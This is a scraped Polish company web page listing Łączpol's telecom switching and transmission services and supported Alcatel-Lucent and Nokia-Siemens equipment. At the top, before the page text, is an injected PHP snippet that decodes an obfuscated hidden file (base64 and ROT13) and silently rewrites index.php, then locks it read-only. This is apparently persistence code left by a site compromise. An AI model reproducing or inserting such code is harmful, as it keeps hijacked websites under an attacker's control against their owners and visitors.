$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Łączpol – Ekspert łączenia technologii

Komutacja i teletransmisja

Komutacja i teletransmisja

Dział komutacji i teletransmisji specjalizuje się w:

– montażu i uruchomieniu central cyfrowych i analogowych,
– montażu i uruchomieniu urządzeń teletransmisyjnych,
– naprawie sprzętu telekomunikacyjnego i radiowego,
– przemieszczaniu urządzeń teletransmisyjnych i komutacyjnych,
– rekonfiguracji i konsolidacji na centralach telefonicznych,
– wykonanie projektów pod urządzenia A-L,
– wymiana akumulatorów w szafach,
– posadowienie fundamentów pod szafy, wraz z posadowieniem szafy i wykonaniem uziemienia.

Instalujemy i testujemy sprzęt firm:

Alcatel-Lucent :

rekonfiguracja (uwalnianie pakietów abonenckich) na centralach telefonicznych
5 ESS 2000 (HOST, RSM, RISLU2, RAIU)

ANY MEDIA – system dostępowy,

STINGER (ADSL+), FS+, LS, MRT, MRT2, MS+, ISAM A7330 , A7302 , AM, ADM, LXT, ISM 2000, AMU (systemy teletransmisyjne SDH)

DWDM (m.in. Typ1696MS , 1830PSS32, 1626LM, 1850TSS100,1646SM/SMC )
site survey (przegląd i przygotowanie pomieszczeń do wykonania projektu)

Nokia-Siemens :

EWSD (HOST, DLTU)Fastlink
ADSL
SDH, Marconi (systemy teletransmisyjne)
Instalacja ETSI RACK